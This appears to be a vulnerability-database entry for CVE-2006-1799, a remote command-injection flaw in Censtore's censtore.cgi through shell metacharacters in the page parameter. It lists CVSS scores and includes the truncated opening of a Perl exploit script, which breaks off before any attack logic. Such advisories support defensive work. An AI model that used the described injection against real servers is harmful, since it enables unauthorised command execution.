7.5
CVSSv2

CVE-2006-1799

Published: 18/04/2006 Updated: 19/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

censtore.cgi in Censtore 7.3.002 and previous versions allows remote malicious users to execute arbitrary commands via shell metacharacters in the page parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

adcentrix censtore

Exploits

#!/usr/bin/perl # # Censtorecgi exploit by FOX_MULDER (fox_mulder@abvbg) # # Vulnerability foud by FOX_MULDER # # This is the first exploit i release and the bug is not public so enjoy # Ask censtorecom/ what they think about it !!! # ########################### use IO::Socket; use LWP::Simple; sub Usage { print STDERR "\nFOX_M ...